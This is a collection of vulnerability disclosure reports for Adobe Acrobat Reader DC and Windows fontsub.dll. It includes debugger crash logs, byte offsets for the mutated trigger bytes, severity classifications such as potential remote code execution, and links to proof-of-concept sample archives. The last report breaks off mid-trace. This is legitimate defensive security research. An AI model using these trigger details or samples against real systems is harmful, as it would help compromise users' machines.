https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47268.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (180c.327c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=27829020 ebx=1537d7d8 ecx=00000030 edx=00000001 esi=27828ff0 edi=1537d890 eip=609ed114 esp=2ad6a1c0 ebp=2ad6a208 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 VCRUNTIME140!TrailingDownVec+0x1d4: 609ed114 f30f6f4e10 movdqu xmm1,xmmword ptr [esi+10h] ds:002b:27829000=???????????????????????????????? 0:014> kb # ChildEBP RetAddr Args to Child 00 2ad6a1c4 10dfaec3 1537d890 27828ff0 00000030 VCRUNTIME140!TrailingDownVec+0x1d4 [f:\dd\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 635] 01 2ad6a208 10d737f2 153156b0 27828ff0 00000010 AGM!AGMGetVersion+0x74273 02 2ad6a244 10d7522f 2ad6a27c 153156b0 27828ff0 AGM!AGMTerminate+0x14f42 03 2ad6a290 0f5ab6b8 2ad6a2b4 153158b8 27828ff0 AGM!AGMTerminate+0x1697f 04 2ad6a2b8 0f49861b 1b7a27f4 27828ff0 00000010 AcroRd32!AX_PDXlateToHostEx+0x1fd668 05 2ad6a2f8 0f692cea 1b7a27f4 27828ff0 00000010 AcroRd32!AX_PDXlateToHostEx+0xea5cb 06 2ad6a414 0f21a7d9 00000001 d497abe9 00000000 AcroRd32!AX_PDXlateToHostEx+0x2e4c9a 07 2ad6a4c8 0f219928 2ad6a870 00000000 d497a735 AcroRd32!DllCanUnloadNow+0x181819 08 2ad6a814 0f2198e6 2ad6a870 1b577188 d497a76d AcroRd32!DllCanUnloadNow+0x180968 09 2ad6a84c 0f2197c1 2ad6a870 1b577188 2ad6a8dc AcroRd32!DllCanUnloadNow+0x180926 0a 2ad6a8b8 0f218788 c0010000 000001bd 1b577188 AcroRd32!DllCanUnloadNow+0x180801 0b 2ad6ad18 0f215cd7 2ad6b01c 0c3d578c c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8 0c 2ad6c4f8 0f215955 0c3d578c c0010000 000001bd AcroRd32!DllCanUnloadNow+0x17cd17 0d 2ad6c5c8 0f1f93ed d497c989 1b577188 00000000 AcroRd32!DllCanUnloadNow+0x17c995 0e 2ad6c6a8 0f270753 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 0f 2ad6c708 0f218184 00000000 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3 10 2ad6dedc 0f215955 0c3d5708 c0010000 000001be AcroRd32!DllCanUnloadNow+0x17f1c4 11 2ad6dfac 0f1f93ed d497efad 0c3c08a0 00000000 AcroRd32!DllCanUnloadNow+0x17c995 12 2ad6e08c 0f270753 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 13 2ad6e0ec 0f218184 00000001 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3 14 2ad6f8c0 0f215955 0c3d5684 c0010000 000001b2 AcroRd32!DllCanUnloadNow+0x17f1c4 15 2ad6f990 0f1f93ed d497f551 00000000 1b79f458 AcroRd32!DllCanUnloadNow+0x17c995 16 2ad6fa70 0f222848 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 17 2ad6fac8 0f222647 00000000 00000000 0f2220d0 AcroRd32!DllCanUnloadNow+0x189888 18 2ad6fb34 0f221fec d497f47d 0f221540 15ab5938 AcroRd32!DllCanUnloadNow+0x189687 19 2ad6fb5c 0f221551 0d104ab8 0f221540 2ad6fb80 AcroRd32!DllCanUnloadNow+0x18902c 1a 2ad6fb6c 73cf8674 15ab5938 73cf8650 e681ff4b AcroRd32!DllCanUnloadNow+0x188591 1b 2ad6fb80 77285e17 15ab5938 c47e6da9 00000000 KERNEL32!BaseThreadInitThunk+0x24 1c 2ad6fbc8 77285de7 ffffffff 772aad8d 00000000 ntdll!__RtlUserThreadStart+0x2f 1d 2ad6fbd8 00000000 0f221540 15ab5938 00000000 ntdll!_RtlUserThreadStart+0x1b 0:014> !heap -p -a 27828ff0 address 27828ff0 found in _DPH_HEAP_ROOT @ c1a1000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 28631e38: 27828ff0 10 - 27828000 2000 ? windows_storage!CStorageItemsDataFormat::SetFromStorageItemsArray<Windows::Foundation::Collections::IIterable<Windows::Storage::StorageFolder *>,<lambda_3b893a90b183593f6fe9d34608c3a173> >+b4 66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240 77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c 7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6 7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 7725ccee ntdll!RtlAllocateHeap+0x0000003e 66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 74a2f1f6 ucrtbase!_malloc_base+0x00000026 0f04fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9 0f6933e4 AcroRd32!AX_PDXlateToHostEx+0x002e5394 0f692a25 AcroRd32!AX_PDXlateToHostEx+0x002e49d5 0f21a7d9 AcroRd32!DllCanUnloadNow+0x00181819 0f219928 AcroRd32!DllCanUnloadNow+0x00180968 0f2198e6 AcroRd32!DllCanUnloadNow+0x00180926 0f2197c1 AcroRd32!DllCanUnloadNow+0x00180801 0f218788 AcroRd32!DllCanUnloadNow+0x0017f7c8 0f215cd7 AcroRd32!DllCanUnloadNow+0x0017cd17 0f215955 AcroRd32!DllCanUnloadNow+0x0017c995 0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d 0f270753 AcroRd32!CTJPEGDecoderRelease+0x000358c3 0f218184 AcroRd32!DllCanUnloadNow+0x0017f1c4 0f215955 AcroRd32!DllCanUnloadNow+0x0017c995 0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d 0f270753 AcroRd32!CTJPEGDecoderRelease+0x000358c3 0f218184 AcroRd32!DllCanUnloadNow+0x0017f1c4 0f215955 AcroRd32!DllCanUnloadNow+0x0017c995 0f1f93ed AcroRd32!DllCanUnloadNow+0x0016042d 0f222848 AcroRd32!DllCanUnloadNow+0x00189888 0f222647 AcroRd32!DllCanUnloadNow+0x00189687 0f221fec AcroRd32!DllCanUnloadNow+0x0018902c 0f221551 AcroRd32!DllCanUnloadNow+0x00188591 73cf8674 KERNEL32!BaseThreadInitThunk+0x00000024 77285e17 ntdll!__RtlUserThreadStart+0x0000002f --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with the PageHeap option in Application Verifier enabled. - The crash occurs immediately after opening the PDF document. - The crash occurs inside of the memcpy() function while trying to read from out-of-bounds memory, and its arguments indicate that the program tries to copy 0x30 (48) bytes out of a 0x10-byte heap-based buffer. - Attached samples: poc1.pdf (crashing file), poc2.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to a single byte at offset 0x30b35f, changed from the original value of 0x11 to 0x10 (in the first sample) or to 0x15 (in the second sample). This byte appears to reside inside of a binary JP2K image stream. - We classify the bug as an information disclosure issue. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47270.zip

-----=====[ Background ]=====----- The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. -----=====[ Description ]=====----- We have encountered the following crash in fontsub!FixSbitSubTableFormat1: --- cut --- (e38.4e58): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. FONTSUB!FixSbitSubTableFormat1+0x76: 00007fff`c08717ce 438b0c1a mov ecx,dword ptr [r10+r11] ds:000001fa`7e952000=???????? 0:000> ? r10 Evaluate expression: 64 = 00000000`00000040 0:000> ? r11 Evaluate expression: 2175377153984 = 000001fa`7e951fc0 0:000> !heap -p -a r11 address 000001fa7e951fc0 found in _DPH_HEAP_ROOT @ 1fa7e871000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) 1fa7e873958: 1fa7e951fc0 40 - 1fa7e951000 2000 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 00007fffc086fd1e FONTSUB!Mem_Alloc+0x0000000000000012 00007fffc08723db FONTSUB!ModSbit+0x000000000000049b 00007fffc08670aa FONTSUB!CreateDeltaTTFEx+0x0000000000000612 00007fffc0866a63 FONTSUB!CreateDeltaTTF+0x00000000000002cb 00007fffc086132a FONTSUB!CreateFontPackage+0x000000000000015a [...] 0:000> k # Child-SP RetAddr Call Site 00 00000006`9dcfd2d0 00007fff`c0871b0e FONTSUB!FixSbitSubTableFormat1+0x76 01 00000006`9dcfd310 00007fff`c0872460 FONTSUB!FixSbitSubTableArray+0x2aa 02 00000006`9dcfd430 00007fff`c08670aa FONTSUB!ModSbit+0x520 03 00000006`9dcfd570 00007fff`c0866a63 FONTSUB!CreateDeltaTTFEx+0x612 04 00000006`9dcfd690 00007fff`c086132a FONTSUB!CreateDeltaTTF+0x2cb 05 00000006`9dcfd7d0 00007ff6`1a8a85d1 FONTSUB!CreateFontPackage+0x15a [...] --- cut --- The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. It could be potentially used to disclose sensitive data from the process address space. It is easiest to reproduce with PageHeap enabled. Attached are 3 proof of concept malformed font files which trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47269.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (2040.5034): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=14080e48 ebx=00000000 ecx=148d9d48 edx=00000000 esi=0ec19d20 edi=f0f0f0f0 eip=0f29f04f esp=050faa10 ebp=050faa34 iopl=0 nv up ei ng nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210286 AcroRd32!AX_PDXlateToHostEx+0x340fff: 0f29f04f 8b4754 mov eax,dword ptr [edi+54h] ds:002b:f0f0f144=???????? 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 050faa34 0f29ff1b 16daf6c0 00000001 16a94648 AcroRd32!AX_PDXlateToHostEx+0x340fff 01 050faa50 0f29524b 1812da54 050faa98 0edcafa6 AcroRd32!AX_PDXlateToHostEx+0x341ecb 02 050faa5c 0edcafa6 1812da54 050faefc 16a94648 AcroRd32!AX_PDXlateToHostEx+0x3371fb 03 050faa98 0edca5b8 c0010000 00000008 16a94648 AcroRd32!DllCanUnloadNow+0x181fe6 04 050fab54 0edc9928 050faefc 00000000 a705d59c AcroRd32!DllCanUnloadNow+0x1815f8 05 050faea0 0edc98e6 050faefc 1840e4d8 a705d5e4 AcroRd32!DllCanUnloadNow+0x180968 06 050faed8 0edc97c1 050faefc 1840e4d8 050faf68 AcroRd32!DllCanUnloadNow+0x180926 07 050faf44 0edc8788 c0010000 00000008 1840e4d8 AcroRd32!DllCanUnloadNow+0x180801 08 050fb3a4 0edc5cd7 050fb6a8 14b5884c c0010000 AcroRd32!DllCanUnloadNow+0x17f7c8 09 050fcb84 0edc5955 14b5884c c0010000 00000008 AcroRd32!DllCanUnloadNow+0x17cd17 0a 050fcc54 0eda93ed a705b608 1840e4d8 00000000 AcroRd32!DllCanUnloadNow+0x17c995 0b 050fcd34 0ee20753 00000000 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 0c 050fcd94 0edc8184 00000000 00000000 00000000 AcroRd32!CTJPEGDecoderRelease+0x358c3 0d 050fe568 0edc5955 14b587c8 c0010000 00000006 AcroRd32!DllCanUnloadNow+0x17f1c4 0e 050fe638 0eda93ed a7059c24 16a6e638 00000000 AcroRd32!DllCanUnloadNow+0x17c995 0f 050fe718 0eda81e8 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x16042d 10 050fe764 0ed9b383 16a6e638 00000001 00000000 AcroRd32!DllCanUnloadNow+0x15f228 11 050fe8d8 0ed9ac97 18084704 00000001 175d4f70 AcroRd32!DllCanUnloadNow+0x1523c3 12 050fe940 0ed98590 a70592fc 21abd808 0c1d0a28 AcroRd32!DllCanUnloadNow+0x151cd7 13 050fe9c0 0ed9825a 175d4f70 18f82c10 0c1d0a38 AcroRd32!DllCanUnloadNow+0x14f5d0 14 050fe9fc 0ed98192 175d4f70 18f82c10 0c1d0a38 AcroRd32!DllCanUnloadNow+0x14f29a 15 050fea84 0ed9750e 175d4f70 18f82c10 050fecb8 AcroRd32!DllCanUnloadNow+0x14f1d2 16 050feac0 0ed96122 175d4f70 18f82c10 050fecb8 AcroRd32!DllCanUnloadNow+0x14e54e 17 050fed84 0ed95168 175d4f70 050fee18 050fee68 AcroRd32!DllCanUnloadNow+0x14d162 18 050fee88 0ed94375 175d4f70 050fefb8 00000000 AcroRd32!DllCanUnloadNow+0x14c1a8 19 050fefdc 0ed934ba 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14b3b5 1a 050ff03c 0ed9334d 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14a4fa 1b 050ff05c 0ed91f3c 175d4f70 050ff0e0 00000000 AcroRd32!DllCanUnloadNow+0x14a38d 1c 050ff114 0ed91962 00000001 00000000 a7058a50 AcroRd32!DllCanUnloadNow+0x148f7c 1d 050ff16c 0ed9177a 181d3680 00000001 a7058aec AcroRd32!DllCanUnloadNow+0x1489a2 1e 050ff1d0 0ed914ff 050ff2c4 a70589d8 18eb9920 AcroRd32!DllCanUnloadNow+0x1487ba 1f 050ff2e4 0ec566ec 18eb9920 0ec56610 00000000 AcroRd32!DllCanUnloadNow+0x14853f 20 050ff2fc 0ec5645f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd72c 21 050ff318 7460e0bb 00300dd4 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd49f 22 050ff344 74618849 0ec563a0 00300dd4 0000000f USER32!_InternalCallWinProc+0x2b 23 050ff368 7461b145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 24 050ff438 74608503 0ec563a0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 25 050ff4a0 74608aa0 0d749a40 00000000 0000000f USER32!DispatchClientMessage+0x1b3 26 050ff4e8 77291a6d 050ff504 00000020 050ff568 USER32!__fnDWORD+0x50 27 050ff520 76e92d3c 746091ee 050ff5b8 ba389ade ntdll!KiUserCallbackDispatcher+0x4d 28 050ff524 746091ee 050ff5b8 ba389ade 0cfaf370 win32u!NtUserDispatchMessage+0xc 29 050ff578 74608c20 bf376fa6 050ff59c 0ec6da8b USER32!DispatchMessageWorker+0x5be 2a 050ff584 0ec6da8b 050ff5b8 0cfaf370 0cfaf370 USER32!DispatchMessageW+0x10 2b 050ff59c 0ec6d81e 050ff5b8 a7058d2c 0cfaf370 AcroRd32!DllCanUnloadNow+0x24acb 2c 050ff610 0ec6d6b4 a7058d74 0cfaf370 00000000 AcroRd32!DllCanUnloadNow+0x2485e 2d 050ff648 0ebfc556 a7058d84 0cf98070 00000000 AcroRd32!DllCanUnloadNow+0x246f4 2e 050ff6b8 0ebfbf81 0ebd0000 00af0000 0cf98070 AcroRd32!AcroWinMainSandbox+0x756 2f 050ffad8 00af783d 0ebd0000 00af0000 0cf98070 AcroRd32!AcroWinMainSandbox+0x181 30 050ffea4 00bffd2a 00af0000 00000000 0c112f0a AcroRd32_exe+0x783d 31 050ffef0 73cf8674 04ecb000 73cf8650 40982fa7 AcroRd32_exe!AcroRd32IsBrokerProcess+0x9940a 32 050fff04 77285e17 04ecb000 393e3559 00000000 KERNEL32!BaseThreadInitThunk+0x24 33 050fff4c 77285de7 ffffffff 772aad8c 00000000 ntdll!__RtlUserThreadStart+0x2f 34 050fff5c 00000000 00af1390 04ecb000 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> u eip-7 AcroRd32!AX_PDXlateToHostEx+0x340ff8: 0f29f048 8b7804 mov edi,dword ptr [eax+4] 0f29f04b 85ff test edi,edi 0f29f04d 7441 je AcroRd32!AX_PDXlateToHostEx+0x341040 (0f29f090) 0f29f04f 8b4754 mov eax,dword ptr [edi+54h] 0f29f052 8945e8 mov dword ptr [ebp-18h],eax 0f29f055 8b4738 mov eax,dword ptr [edi+38h] 0f29f058 85c0 test eax,eax 0f29f05a 741c je AcroRd32!AX_PDXlateToHostEx+0x341028 (0f29f078) 0:000> dd eax 14080e48 f0f0f0f0 f0f0f0f0 a0a0a0a0 a0a0a0a0 14080e58 00000000 00000000 d3b8376a 101b7bae 14080e68 abcdaaa9 8bfc1000 00000028 00000050 14080e78 00000002 16fdf310 0b043584 dcbaaaa9 14080e88 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0 14080e98 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0 14080ea8 f0f0f0f0 f0f0f0f0 a0a0a0a0 a0a0a0a0 14080eb8 00000000 00000000 d4b8376d 101b7baa 0:000> !heap -p -a eax address 14080e48 found in _HEAP @ c110000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 14080e20 0008 0000 [00] 14080e48 00008 - (free DelayedFree) 66d6c396 verifier!AVrfpDphNormalHeapFree+0x000000b6 66d6ab43 verifier!AVrfDebugPageHeapFree+0x000000e3 77305359 ntdll!RtlDebugFreeHeap+0x0000003c 7725ad86 ntdll!RtlpFreeHeap+0x000000d6 7725ac3d ntdll!RtlFreeHeap+0x000007cd 66e5aad0 vrfcore!VfCoreRtlFreeHeap+0x00000020 74a2db1b ucrtbase!_free_base+0x0000001b 74a2dae8 ucrtbase!free+0x00000018 ec02849 AcroRd32!AcroWinMainSandbox+0x00006a49 1a0e8706 JP2KLib!JP2KTileGeometryRegionIsTile+0x00000286 1a0d0e0a JP2KLib!JP2KCopyRect+0x0000bc0a 1a0e7904 JP2KLib!JP2KImageInitDecoderEx+0x00000024 f29f8e8 AcroRd32!AX_PDXlateToHostEx+0x00341898 f2a1508 AcroRd32!AX_PDXlateToHostEx+0x003434b8 f29522b AcroRd32!AX_PDXlateToHostEx+0x003371db f29f164 AcroRd32!AX_PDXlateToHostEx+0x00341114 edcaf85 AcroRd32!DllCanUnloadNow+0x00181fc5 edca5b8 AcroRd32!DllCanUnloadNow+0x001815f8 edc9928 AcroRd32!DllCanUnloadNow+0x00180968 edc98e6 AcroRd32!DllCanUnloadNow+0x00180926 edc97c1 AcroRd32!DllCanUnloadNow+0x00180801 edc8788 AcroRd32!DllCanUnloadNow+0x0017f7c8 edc5cd7 AcroRd32!DllCanUnloadNow+0x0017cd17 edc5955 AcroRd32!DllCanUnloadNow+0x0017c995 eda93ed AcroRd32!DllCanUnloadNow+0x0016042d ee20753 AcroRd32!CTJPEGDecoderRelease+0x000358c3 edc8184 AcroRd32!DllCanUnloadNow+0x0017f1c4 edc5955 AcroRd32!DllCanUnloadNow+0x0017c995 eda93ed AcroRd32!DllCanUnloadNow+0x0016042d eda81e8 AcroRd32!DllCanUnloadNow+0x0015f228 ed9b383 AcroRd32!DllCanUnloadNow+0x001523c3 ed9ac97 AcroRd32!DllCanUnloadNow+0x00151cd7 --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10. Reproduces most cleanly with Light PageHeap enabled in Application Verifier for the AcroRd32.exe process (which fills freed allocations with 0xf0f0f0...). Without PageHeap, the crash typically occurs in ntdll!RtlReportCriticalFailure. - The crash occurs immediately after opening the PDF document. It is a use-after-free condition which subsequently leads to memory corruption. - Attached samples: poc1.pdf and poc2.pdf (crashing files), original1.pdf and original2.pdf (corresponding original files). - We have minimized the differences between the original and mutated files down to 2 bytes inside of binary JP2 image streams. For poc1.pdf, the modifications are at offsets 0x290a and 0x298b; for poc2.pdf, at offsets 0x5b4 and 0x62a. - We classify the bug as a potential RCE. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47271.zip

We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (36ec.3210): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=fffff987 ebx=f8519200 ecx=290cc000 edx=290c8fbc esi=28f43098 edi=fffff851 eip=645412f9 esp=1390d9e4 ebp=00000014 iopl=0 nv up ei ng nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286 AGM!AGMInitialize+0x584c9: 645412f9 8911 mov dword ptr [ecx],edx ds:002b:290cc000=???????? 0:023> !heap -p -a ecx-8 address 290cbff8 found in _DPH_HEAP_ROOT @ bc51000 in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) bc53d9c: 28c10090 4bbf70 - 28c10000 4bd000 66d6a8d0 verifier!AVrfDebugPageHeapAllocate+0x00000240 77304b26 ntdll!RtlDebugAllocateHeap+0x0000003c 7725e3e6 ntdll!RtlpAllocateHeap+0x000000f6 7725cfb7 ntdll!RtlpAllocateHeapInternal+0x000002b7 7725ccee ntdll!RtlAllocateHeap+0x0000003e 66e5aa2f vrfcore!VfCoreRtlAllocateHeap+0x0000001f 74a2f1f6 ucrtbase!_malloc_base+0x00000026 0e75fcd9 AcroRd32!AcroWinMainSandbox+0x00003ed9 64531c72 AGM!AGMInitialize+0x00048e42 0:023> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 1390da28 77240a31 07bb5958 64540190 1390daac AGM!AGMInitialize+0x584c9 01 1390da9c 74a2f1f6 f238e0c0 07bb5958 0dc0fc40 ntdll!RtlCaptureStackBackTrace+0x41 02 1390dab8 0e75fcd9 004bbf70 0e75fcc0 6451f0bd ucrtbase!_malloc_base+0x26 03 1390db54 6451e588 12b91f98 0000047b 00000001 AcroRd32!AcroWinMainSandbox+0x3ed9 04 1390db58 12b91f98 0000047b 00000001 00000000 AGM!AGMInitialize+0x35758 05 1390db5c 00000000 00000001 00000000 17191e14 0x12b91f98 --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20035) on Windows 10, with and without PageHeap enabled. Without PageHeap, the crash may also be triggered in ntdll!RtlReportCriticalFailure, if the system allocator detects a corrupted chunk. - The crash is caused by a heap-based buffer overflow and occurs immediately after opening the PDF document (poc1.pdf), or with a bit of interaction (scrolling to other pages, zooming in and out) for poc2.pdf and poc3.pdf. - We classify the bug as a potential RCE. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47272.zip

We have observed the following crash in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- ======================================= VERIFIER STOP 00000007: pid 0x2C1C: Heap block already freed. 0C441000 : Heap handle for the heap owning the block. 147E6638 : Heap block being freed again. 00000010 : Size of the heap block. 00000000 : Not used ======================================= This verifier stop is not continuable. Process will be terminated when you use the `go' debugger command. ======================================= (2c1c.491c): Break instruction exception - code 80000003 (first chance) eax=66e603a0 ebx=00000000 ecx=000001a1 edx=0536c661 esi=66e5dd88 edi=0c441000 eip=66e53ae6 esp=0536c948 ebp=0536cb5c iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202 vrfcore!VerifierStopMessageEx+0x5b6: 66e53ae6 cc int 3 0:000> kb # ChildEBP RetAddr Args to Child 00 0536cb5c 66e58038 66e5d258 00000007 0c441000 vrfcore!VerifierStopMessageEx+0x5b6 01 0536cb80 66d6da5e 00000007 66d61cbc 0c441000 vrfcore!VfCoreRedirectedStopMessage+0x88 02 0536cbd8 66d6b8a8 00000007 66d61cbc 0c441000 verifier!VerifierStopMessage+0x8e 03 0536cc44 66d6bdea 0c441000 00000004 147e6638 verifier!AVrfpDphReportCorruptedBlock+0x1b8 04 0536cca0 66d6c302 0c441000 147e6638 00000004 verifier!AVrfpDphCheckNormalHeapBlock+0x11a 05 0536ccc0 66d6ab43 0c441000 0c640000 01000002 verifier!AVrfpDphNormalHeapFree+0x22 06 0536cce4 77305359 0c440000 01000002 147e6638 verifier!AVrfDebugPageHeapFree+0xe3 07 0536cd54 7725ad86 147e6638 ab70558b 00000000 ntdll!RtlDebugFreeHeap+0x3c 08 0536ceb0 7725ac3d 00000000 147e6638 00000000 ntdll!RtlpFreeHeap+0xd6 09 0536cf04 66e5aad0 0c440000 00000000 147e6638 ntdll!RtlFreeHeap+0x7cd 0a 0536cf20 74a2db1b 0c440000 00000000 147e6638 vrfcore!VfCoreRtlFreeHeap+0x20 0b 0536cf34 74a2dae8 147e6638 00000000 0536cf54 ucrtbase!_free_base+0x1b 0c 0536cf44 0f012849 147e6638 16fd32f8 0536d068 ucrtbase!free+0x18 WARNING: Stack unwind information not available. Following frames may be wrong. 0d 0536cf54 0f6d6441 147e6638 31577737 0536d0b8 AcroRd32!AcroWinMainSandbox+0x6a49 0e 0536d068 0f6c20a4 0536d0d8 00000001 00000b20 AcroRd32!CTJPEGTiledContentWriter::operator=+0x18bb1 0f 0536d230 0f6bf15d 00000000 00000000 00000000 AcroRd32!CTJPEGTiledContentWriter::operator=+0x4814 10 0536d264 0f6b209f 1771f6b4 1771f6b4 194f9078 AcroRd32!CTJPEGTiledContentWriter::operator=+0x18cd 11 0536d278 0f6a5007 194f9078 000033f8 2037a088 AcroRd32!AX_PDXlateToHostEx+0x34404f 12 0536d32c 0f0a57c9 1771f6b4 19053d28 0f0a5730 AcroRd32!AX_PDXlateToHostEx+0x336fb7 13 0536d350 0f0a56c3 1cb80970 00000001 0013d690 AcroRd32!DllCanUnloadNow+0x4c809 14 0536d370 0f02e7e1 0536d390 1cb80970 0013d690 AcroRd32!DllCanUnloadNow+0x4c703 15 0536d398 0f02e78d 1cb80970 00000001 0013d690 AcroRd32!AcroWinMainSandbox+0x229e1 16 0536d3ac 0f0e8a5b 1cb80970 00000001 0013d690 AcroRd32!AcroWinMainSandbox+0x2298d 17 0536d3c8 0f1f4315 1cb80970 00000001 0013d690 AcroRd32!DllCanUnloadNow+0x8fa9b 18 0536d42c 0f6568a8 00000000 00000e44 205378ac AcroRd32!CTJPEGDecoderHasMoreTiles+0x1a15 19 0536d4ac 0f56ae8d 0536d4cc 0536d4dc 315773af AcroRd32!AX_PDXlateToHostEx+0x2e8858 1a 0536d4f0 10d5da8c 17b908d0 0536d55c bb3e57b9 AcroRd32!AX_PDXlateToHostEx+0x1fce3d 1b 0536d56c 10d5e053 0536d5b8 bb3e5771 00000000 AGM!AGMGetVersion+0x16e3c 1c 0536d5a4 10fffb4c 193d706c 0536d5b8 fffffff9 AGM!AGMGetVersion+0x17403 1d 0536d5bc 10cd9a32 0536d650 bb3e5855 17c76ff8 AGM!AGMGetVersion+0x2b8efc 1e 0536da80 10cd75d6 0536df90 17c76ff8 0536df04 AGM!AGMInitialize+0x40c02 1f 0536df24 10cd4133 0536df90 17c76ff8 0536e124 AGM!AGMInitialize+0x3e7a6 20 0536e144 10cd2370 19891678 18f911e8 17c616f8 AGM!AGMInitialize+0x3b303 21 0536e320 10cd0dec 19891678 18f911e8 bb3e61b9 AGM!AGMInitialize+0x39540 22 0536e36c 10cfffbf 19891678 18f911e8 17150de0 AGM!AGMInitialize+0x37fbc 23 0536e398 10cffb7f 18f911e8 bb3e66d1 17150de0 AGM!AGMInitialize+0x6718f 24 00000000 00000000 00000000 00000000 00000000 AGM!AGMInitialize+0x66d4f 0:000> !heap -p -a 147E6638 address 147e6638 found in _HEAP @ c640000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 147e6610 0009 0000 [00] 147e6638 00010 - (free DelayedFree) 66d6c396 verifier!AVrfpDphNormalHeapFree+0x000000b6 66d6ab43 verifier!AVrfDebugPageHeapFree+0x000000e3 77305359 ntdll!RtlDebugFreeHeap+0x0000003c 7725ad86 ntdll!RtlpFreeHeap+0x000000d6 7725ac3d ntdll!RtlFreeHeap+0x000007cd 66e5aad0 vrfcore!VfCoreRtlFreeHeap+0x00000020 74a2db1b ucrtbase!_free_base+0x0000001b 74a2dae8 ucrtbase!free+0x00000018 f012849 AcroRd32!AcroWinMainSandbox+0x00006a49 f6d6430 AcroRd32!CTJPEGTiledContentWriter::operator=+0x00018ba0 f6c20a4 AcroRd32!CTJPEGTiledContentWriter::operator=+0x00004814 f6bf15d AcroRd32!CTJPEGTiledContentWriter::operator=+0x000018cd f6b209f AcroRd32!AX_PDXlateToHostEx+0x0034404f f6a5007 AcroRd32!AX_PDXlateToHostEx+0x00336fb7 f0a57c9 AcroRd32!DllCanUnloadNow+0x0004c809 f0a56c3 AcroRd32!DllCanUnloadNow+0x0004c703 f02e7e1 AcroRd32!AcroWinMainSandbox+0x000229e1 f02e78d AcroRd32!AcroWinMainSandbox+0x0002298d f0e8a5b AcroRd32!DllCanUnloadNow+0x0008fa9b f1f4315 